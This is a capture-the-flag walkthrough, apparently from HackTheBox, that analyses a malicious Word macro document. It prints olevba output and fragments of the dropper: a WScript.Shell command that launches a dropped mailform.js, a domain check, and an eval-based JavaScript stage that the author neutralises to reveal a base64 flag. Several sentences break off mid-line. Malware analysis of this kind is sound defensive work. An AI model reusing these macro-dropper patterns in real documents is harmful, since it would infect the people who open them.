Walkthrough
We start by downloading the source files.
The zip file contains a word document named
olevba invitation.docm --deobf
<snip>
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |AutoOpen |Runs when the Word document is opened |
|AutoExec |AutoClose |Runs when the Word document is closed |
|Suspicious|Environ |May read system environment variables |
|Suspicious|Open |May open a file |
|Suspicious|Put |May write to a file (if combined with Open) |
|Suspicious|Binary |May read or write a binary file (if combined |
| | |with Open) |
|Suspicious|Kill |May delete a file |
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|WScript.Shell |May run an executable file or a system |
| | |command |
|Suspicious|Run |May run an executable file or a system |
| | |command |
|Suspicious|CreateObject |May create an OLE object |
|Suspicious|Windows |May enumerate application windows (if |
| | |combined with Shell.Application object) |
|Suspicious|Xor |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Suspicious|VBA obfuscated |VBA string expressions were detected, may be |
| |Strings |used to obfuscate strings (option --decode to|
| | |see all) |
|IOC |mailform.js |Executable file name |
|VBA string|%appdata%\Microsoft\|Environ("appdata") & "\Microsoft\Windows" |
| |Windows | |
|VBA string|%appdata% |Environ("appdata") |
|VBA string|\mailform.js |"\" & "mailform.js" |
|VBA string|" |"""" + " vF8rdgMHKBrvCoCp0ulm" |
| |vF8rdgMHKBrvCoCp0ulm| |
+----------+--------------------+---------------------------------------------+
This output shows that the document contains macros that are likely to be malicious. The
Looking at the macros we see that some things happen on
Reading the code we figure out that it creates a file in the
We create a new word document and open the VBA editor (You need to enable the developer tools in you ribbon). We copy the macros from the
Then we find the line that runs a shell command. We don't want to run this command, so we remove the line.
Set SHELL_OBJECT = CreateObject("WScript.Shell")
SHELL_OBJECT.Run """" + VIRUS_PATH + """" + " vF8rdgMHKBrvCoCp0ulm"
If we look closely we can find a checks for a specific domain. To run this locally we need to remove the check for the domain.
chkDomain = "GAMEMASTERS.local"
strUserDomain = Environ$("UserDomain")
If chkDomain <> strUserDomain Then
Else
Because we are not running the macros on the correct document we need to change
Now we can run the
Unfortuantely, the
The first line reads the argument. We can hardcode the argument to
var lVky = WScript.Arguments;
var lVky = "vF8rdgMHKBrvCoCp0ulm";
Looking further we see that the script calculates some variables and then calles
Iwlh = xR68(DASz, Iwlh);
eval(Iwlh);
Iwlh = xR68(DASz, Iwlh);
console.log(Iwlh);
Now we can run the script and see what it tries to execute. This gives us a new script. You can download the script here.
Looking at this script with jsnice we find a cookie named
S47T.SETREQUESTHEADER("Cookie:","flag=SFRCe200bGQwY3NfNHIzX2czdHQxbmdfVHIxY2tpMTNyfQo=");
This looks like a base64 encoded string. We can decode it to get the flag.
base64 -d
SFRCe200bGQwY3NfNHIzX2czdHQxbmdfVHIxY2tpMTNyfQo=
HTB{m4ld0cs_4r3_g3tt1ng_Tr1cki13r}